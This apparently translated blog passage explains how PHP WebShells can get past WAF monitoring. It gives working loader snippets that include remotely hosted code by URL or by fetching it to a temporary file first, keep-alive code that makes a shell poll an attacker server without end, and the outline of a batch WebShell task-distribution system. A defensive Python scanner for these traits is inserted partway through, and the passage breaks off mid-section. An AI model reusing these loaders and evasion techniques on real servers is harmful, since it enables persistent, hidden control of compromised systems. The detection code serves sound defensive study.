To summarize briefly, there are at least three links (stages) that can be used for
WebShell monitoring:
WebShell file characteristics
HTTP characteristics of WebShell requests
HTTP characteristics of WebShell response
We recommend ModSecurity, an open source WAF (Web Application Firewall), which can effectively intercept a wide range of attacks on the Web and block WebShell requests and responses on the Web Server.
Breaking the rules: request and response separation
Study the three major links of WebShell monitoring carefully and you will certainly learn something. In fact, the request-response link can be circumvented completely, which avoids detection and blocking by all kinds of WAFs. The core ideas are:
Reduce the character-level features of the file
Load instructions remotely
Separate request and response
No HTTP request feature
No HTTP response feature
The timing diagram of the specific realization idea is as follows:
The first link carries no distinctive features
The second and fourth links are initiated by the Web Server and do not pass through the WAF
The third link only executes code; no file is written to disk
hacker1.com and hacker2.com can be the same server
Could it be more exciting?
Based on the above ideas, I combined some features of script files and developed a set of batch WebShell management tools that support task publishing.
Load remote commands
<?php include('http://example.com/logo.png'); ?> // requires allow_url_include=On
If the PHP configuration directive allow_url_include is Off, you can use the following code instead:
<?php
// Fetch the remote payload to a local temporary file, include it, then remove it
@file_put_contents('_', @file_get_contents('http://127.0.0.1/x.png'));
@include('_');
@unlink('_'); // PHP has no delete(); unlink() removes the temporary file
?>
The returned content of logo.png is completely controlled by example.com.
Exploit the infinite loop
First, the WebShell needs only one request; all subsequent instructions are loaded periodically by the WebShell itself from the remote server, which completely sidesteps request-based behavior detection. Take PHP as an example. Once the script has started, it no longer reacts to the browser closing the connection and enters an endless work loop. You can include the following code when the remote code is loaded for the first time:
<?php
ignore_user_abort(true); // keep running after the client disconnects
set_time_limit(0);       // remove the maximum execution time
?>
As long as Apache/Nginx is not restarted, this WebShell keeps running and polls the remote server for commands at regular intervals.
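As an added defensive example (not code from the original article), the following Python script triages PHP files on disk for the traits described in the two sections above: a URL passed to include, the fetch-to-disk-then-include loader, and the ignore_user_abort/set_time_limit(0) keep-alive pair. The indicator weights and the threshold are my own assumptions and should be tuned against the false-positive rate of the code base being scanned.

```python
"""Static triage of PHP files for the remote-loader and keep-alive traits
discussed above. Added defensive example, not code from the original article."""
import re
import sys
from pathlib import Path

# (name, weight, regex). The weights are an assumption of mine; tune them
# against the false-positive rate of your own code base.
INDICATORS = [
    # include/require of a URL: the allow_url_include=On loader
    ("remote_include", 3,
     re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I)),
    # fetch a URL to disk, then include it: the allow_url_include=Off loader
    ("fetch_then_include", 3,
     re.compile(r"file_put_contents\s*\(.*?file_get_contents\s*\(\s*['\"]https?://",
                re.I | re.S)),
    # keep running after the client disconnects
    ("ignore_user_abort", 1, re.compile(r"ignore_user_abort\s*\(\s*true\s*\)", re.I)),
    # remove the execution time limit
    ("no_time_limit", 1, re.compile(r"set_time_limit\s*\(\s*0\s*\)", re.I)),
    # @-suppressed file/include calls keep failures out of the error log
    ("error_suppression", 1,
     re.compile(r"@(?:include|require|file_get_contents|file_put_contents|unlink)\b")),
]
KEEP_ALIVE_PAIR = {"ignore_user_abort", "no_time_limit"}
THRESHOLD = 3  # assumption: one loader pattern alone is enough to flag a file


def scan_php_source(src: str) -> dict:
    """Return matched indicator names, a weighted score and a verdict."""
    hits = [name for name, _w, rx in INDICATORS if rx.search(src)]
    score = sum(w for name, w, _rx in INDICATORS if name in hits)
    # Each keep-alive call is common on its own; the pair is rare outside
    # intentional daemons, so it earns a bonus.
    if KEEP_ALIVE_PAIR <= set(hits):
        score += 2
    return {"hits": hits, "score": score, "suspicious": score >= THRESHOLD}


def scan_tree(root: str) -> list:
    """Scan every *.php file under root; return (path, result) for flagged files."""
    flagged = []
    for path in Path(root).rglob("*.php"):
        result = scan_php_source(path.read_text(errors="replace"))
        if result["suspicious"]:
            flagged.append((str(path), result))
    return flagged


if __name__ == "__main__":
    for path, res in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: score={res['score']} hits={','.join(res['hits'])}")
```

Run it against the web root; a flagged file is a lead for review, not proof, since legitimate long-running scripts can legitimately use the keep-alive pair.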
Task distribution
If a WebShell is maintained only through a general-purpose webshell client, then in most cases it simply lies on the disk and its value is never fully used. This Shell management system is completely different and exploits the value of the WebShell to the full. As the number of managed WebShells grows, a set of independent management interfaces can be developed to manage them.
Since each WebShell has its own running ID, different instructions can be issued to different WebShells so that they perform different tasks: